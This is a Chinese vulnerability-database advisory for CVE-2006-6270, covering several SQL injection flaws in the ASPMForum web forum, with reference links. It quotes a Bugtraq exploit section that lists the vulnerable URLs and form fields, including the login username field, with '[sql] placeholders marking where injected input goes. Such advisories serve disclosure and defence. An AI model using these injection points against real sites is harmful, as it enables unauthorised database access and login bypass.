ASPMForum 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192651 漏洞类型 SQL注入
发布时间 2006-12-04 更新时间 2006-12-04
CVE编号 CVE-2006-6270 CNNVD-ID CNNVD-200612-070
漏洞平台 N/A CVSS评分 10.0
|漏洞来源
https://www.securityfocus.com/bid/82209
https://cxsecurity.com/issue/WLB-2006120035
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-070
|漏洞详情
ASPMForum存在多个SQL注入漏洞,远程攻击者可通过(1)在forum2.asp内的soruid参数,(2)在kullanicilistesi.asp内的ak参数,(3)在aramayap.asp内的kelimeler参数,和(4)在giris.asp内的kullaniciadi参数来执行任意SQL命令;远程认证用户通过在(5)mesajkutum.asp内的mesajno参数来执行任意SQL命令。
|漏洞EXP
vendor site:http://www.kervancilar.com/
product:Aspmforum
bug:injection sql (get & post)
risk:high

injection sql get :
/forum.asp?baslik='[sql]
/forum2.asp?baslik=2&soruid='[sql]
/kullanicilistesi.asp?ak=&at=&harf='[sql]
/kullanicilistesi.asp?at=baslayan&ak='[sql]
once logged : 
/mesajkutum.asp?eylem=oku&mesajno='[sql]    //private message

injection sql post:
in : /aramayap.asp
Variables:
kelimeler='[sql]
or just post your query into the search engine ...

in : /giris.asp
Variables:
kullaniciadi='[sql]&parola=&I1.x=0&I1.y=0&I1=Submit
or just post your query into the username field

laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
|受影响的产品
Kervancilar Aspmforum 0
|参考资料

来源:BUGTRAQ
名称:20061115Aspmforum[multiplesinjectionsql(get&post)]
链接:http://www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded
来源:BID
名称:21113
链接:http://www.securityfocus.com/bid/21113
来源:SREASON
名称:1963
链接:http://securityreason.com/securityalert/1963